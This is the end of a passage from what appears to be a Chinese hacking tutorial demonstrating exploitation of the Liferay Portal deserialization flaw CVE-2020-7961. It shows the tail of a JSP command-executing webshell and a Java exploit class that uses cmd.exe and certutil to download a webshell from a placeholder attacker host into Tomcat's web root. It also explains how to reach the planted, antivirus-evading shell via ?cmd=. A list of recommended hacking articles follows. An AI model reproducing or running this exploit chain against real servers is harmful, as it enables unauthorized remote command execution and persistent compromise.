int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
替换编译下面的java:
public class LifExp {第四行,Windows下使用certutil.exe可以实现文件下载,curl功能 。
static {
try {
String[] cmd = {"cmd.exe", "/c", "certutil.exe -urlcache -split -f", "http://IP:端口/jspshell.txt", "..\webapps\ROOT\jspshell.jsp"};
java.lang.Runtime.getRuntime().
exec(cmd).waitFor();
} catch ( Exception e ) {
e.printStackTrace();
}
}
}
因为当前靶机执行命令的路径是 tomcatbin 所以我们下载webshell的时候,一定要下载到index.jsp相同路径便于我们访问,也就是 tomcat-9.0.17webappsROOT。
执行了命令之后,我们在这个文件夹下面已经可以看到我们的shell了:
文章插图
而这个时候我们已经可以正常访问shell了:
文章插图
因为用的免杀shell用法?cmd=cmd /c 命令,所以需要进行url编码才可用 。
【黑客演示CVE-2020-7961_Liferay Portal反序列化漏洞】
推荐阅读
- 黑客术语介绍!web渗透小白的进阶之路
- 2019年十大web黑客技术榜单
- AlgorithmMan,一套免费的算法演示神器
- 现代黑客使用的10种常用技术
- 究竟中国黑客如何保卫中国互联网?
- 保护Windows计算机免受黑客和恶意软件侵害的最佳方法
- 苹果8怎么到刷机界面?苹果8plus怎么刷机界面?
- 黑客最喜欢的常见未授权访问漏洞系
- 渗透测试——XSS利用工具BeEF攻击演示
- 电影|《黑客帝国:觉醒》交通高峰期艺术摄影 宛如真实画面